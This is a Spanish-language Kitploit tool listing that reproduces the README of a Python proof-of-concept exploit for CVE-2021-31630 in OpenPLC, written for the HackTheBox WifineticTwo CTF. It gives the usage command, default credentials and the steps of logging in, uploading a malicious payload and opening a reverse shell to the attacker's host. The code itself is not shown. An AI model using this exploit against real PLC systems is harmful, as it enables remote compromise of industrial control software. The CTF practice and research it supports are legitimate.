Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
htb-wifinetictwo-exploit — Un script simple en Python para explotar CVE-2021-31630 en HTB WifineticTwo CTF | Kitploit
Herramientas/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFAprendizaje y EducaciónHerramienta de Acceso RemotoExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

Un script simple en Python para explotar CVE-2021-31630 en HTB WifineticTwo CTF

Ver Repositorio
hace 2 añosAún no revisado

CVE-2021-31630 PoC de Exploit

Este script de Python es un exploit de Prueba de Concepto (PoC) para CVE-2021-31630, dirigido a una vulnerabilidad en OpenPLC que se ejecuta en la máquina WifineticTwo de HackTheBox. Está diseñado únicamente con fines educativos, con el objetivo de demostrar el proceso de explotación en un entorno controlado.

Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines de investigación de seguridad y educativos. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. El desarrollador no se responsabilizará de ningún daño o cargo penal contra los usuarios que hagan mal uso de este exploit.

Prerrequisitos

Antes de ejecutar este exploit, asegúrate de tener:

  • Python 3 instalado en tu sistema.
  • La biblioteca requests instalada. Puedes instalarla usando pip install requests.

Uso

Para usar este exploit, debes especificar la URL del objetivo, la IP del host local (LHOST) y el puerto local (LPORT) al que la shell inversa debe conectarse. Opcionalmente, puedes especificar el nombre de usuario y la contraseña de OpenPLC si difieren de los predeterminados.

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

Argumentos

  • --target - Dirección base del objetivo. Ejemplo: http://wifinetictwo.htb:8080
  • --lhost - Dirección IP del host local para que la shell inversa se conecte.
  • --lport - Puerto local para que la shell inversa se conecte.
  • --usr - (Opcional) Nombre de usuario para OpenPLC. Por defecto es openplc.
  • --pwd - (Opcional) Contraseña para OpenPLC. Por defecto es openplc.

Características

  • Maneja automáticamente el proceso de inicio de sesión usando las credenciales proporcionadas.
  • Crea y sube un payload malicioso para lograr la ejecución remota de código.
  • Inicia una shell inversa hacia la IP y puerto especificados por el atacante.

Proceso de explotación

  1. Inicio de sesión: El script se conecta a la aplicación OpenPLC usando las credenciales proporcionadas.
  2. Creación del payload: Crea dinámicamente un payload malicioso diseñado para iniciar una shell inversa.
  3. Subida del payload: Sube el payload creado al servidor.
  4. Disparo del exploit: Activa el exploit intentando compilar el código malicioso subido, lo que resulta en una shell inversa.

Agradecimientos

  • Agradecimientos especiales a Fellipe Oliveira quien descubrió y reportó CVE-2021-31630.
  • A HackTheBox por proporcionar un entorno realista para practicar y aprender sobre ciberseguridad.
Descargar herramienta